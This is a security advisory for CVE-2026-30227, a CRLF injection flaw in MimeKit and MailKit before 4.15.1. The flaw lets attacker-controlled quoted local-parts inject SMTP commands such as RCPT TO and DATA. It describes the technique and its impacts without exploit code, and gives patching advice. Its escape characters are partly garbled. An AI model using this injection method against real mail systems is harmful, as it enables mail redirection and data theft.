CVE-2026-30227

Name of the Vulnerable Software and Affected Versions MimeKit versions prior to 4.15.1 MailKit versions prior to 4.15.1

Description A CRLF injection flaw exists in MimeKit and MailKit when handling SMTP envelope addresses. Specifically, when the local-part of an address is a quoted-string, the software fails to properly prevent the inclusion of carriage return and line feed characters (r ). This non-compliance with RFC 5321 allows an attacker to inject SMTP commands, such as RCPT TO, DATA, and RSET, or potentially inject mail headers, depending on how the application utilizes MailKit/MimeKit. The issue arises when an attacker can control a MailboxAddress value that is subsequently serialized into an SMTP session. The vulnerability is triggered because RFC 5321 prohibits the use of CR and LF characters within quoted-strings. The affected components are MimeKit 4.15.0 and MailKit 4.15.0, and any application that accepts untrusted input for sender/recipient addresses, constructs MailboxAddress objects from that input, and sends messages via SMTP may be impacted. Exploitation can lead to mail redirection, data exfiltration, corruption of the SMTP transaction state, and potentially header injection or logging evasion.

Recommendations Versions prior to 4.15.1 should be updated to version 4.15.1 or later. Reject carriage return and line feed characters (r and ) in the local-part when parsing or constructing mailbox addresses used for SMTP envelopes. Ensure quoted local-part parsing aligns with RFC 5321’s qtextSMTP and quoted-pairSMTP ranges, disallowing control characters.